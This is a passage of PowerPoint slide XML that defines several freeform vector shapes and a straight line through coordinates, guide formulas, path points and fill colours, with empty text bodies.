          <p:cNvPr id="10445" name="Freeform 526"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="6318250"/>
            <a:ext cx="176212" cy="34925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 78"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T2" fmla="*/ 0 w 78"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T35" fmla="*/ 0 h 15"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T37" fmla="*/ 0 h 15"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T39" fmla="*/ 0 h 15"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T41" fmla="*/ 0 h 15"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T43" fmla="*/ 0 h 15"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T45" fmla="*/ 0 h 15"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T47" fmla="*/ 0 h 15"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T49" fmla="*/ 0 h 15"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 78"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T66" fmla="*/ 0 w 78"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T68" fmla="*/ 0 w 78"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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8"/>
              <a:gd name="T106" fmla="*/ 0 h 15"/>
              <a:gd name="T107" fmla="*/ 78 w 78"/>
              <a:gd name="T108" fmla="*/ 15 h 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8" h="15">
                <a:moveTo>
                  <a:pt x="0" y="15"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10446" name="Freeform 527"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2794000" y="6637338"/>
            <a:ext cx="295275" cy="100012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T34" fmla="*/ 0 w 131"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T37" fmla="*/ 0 h 44"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 44"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 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1"/>
              <a:gd name="T118" fmla="*/ 0 h 44"/>
              <a:gd name="T119" fmla="*/ 131 w 131"/>
              <a:gd name="T120" fmla="*/ 44 h 4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1" h="44">
                <a:moveTo>
                  <a:pt x="54" y="43"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="56" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54" y="43"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10447" name="Freeform 528"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2730500" y="6664325"/>
            <a:ext cx="304800" cy="87313"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 135"/>
              <a:gd name="T1" fmla="*/ 0 h 39"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 39"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 39"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T7" fmla="*/ 0 h 39"/>
              <a:gd name="T8" fmla="*/ 0 w 135"/>
              <a:gd name="T9" fmla="*/ 0 h 39"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 135"/>
              <a:gd name="T16" fmla="*/ 0 h 39"/>
              <a:gd name="T17" fmla="*/ 135 w 135"/>
              <a:gd name="T18" fmla="*/ 39 h 39"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="135" h="39">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="131" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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448" name="Freeform 529"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2782887" y="6650038"/>
            <a:ext cx="298450" cy="82550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 132"/>
              <a:gd name="T1" fmla="*/ 0 h 36"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T7" fmla="*/ 0 h 36"/>
              <a:gd name="T8" fmla="*/ 0 w 132"/>
              <a:gd name="T9" fmla="*/ 0 h 36"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 132"/>
              <a:gd name="T16" fmla="*/ 0 h 36"/>
              <a:gd name="T17" fmla="*/ 132 w 132"/>
              <a:gd name="T18" fmla="*/ 36 h 36"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="132" h="36">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="129" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3"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449" name="Freeform 530"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757487" y="6654800"/>
            <a:ext cx="300038" cy="88900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 133"/>
              <a:gd name="T1" fmla="*/ 0 h 39"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 39"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 39"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T7" fmla="*/ 0 h 39"/>
              <a:gd name="T8" fmla="*/ 0 w 133"/>
              <a:gd name="T9" fmla="*/ 0 h 39"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 133"/>
              <a:gd name="T16" fmla="*/ 0 h 39"/>
              <a:gd name="T17" fmla="*/ 133 w 133"/>
              <a:gd name="T18" fmla="*/ 39 h 39"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="133" h="39">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="131" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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450" name="Line 531"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3519487" y="7358063"/>
            <a:ext cx="617538" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="11113">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10451" name="Freeform 532"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6797675" y="6488113"/>
            <a:ext cx="2703512" cy="1624012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T3" fmla="*/ 0 h 719"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T44" fmla="*/ 0 w 1198"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 719"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 1198"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 719"/>
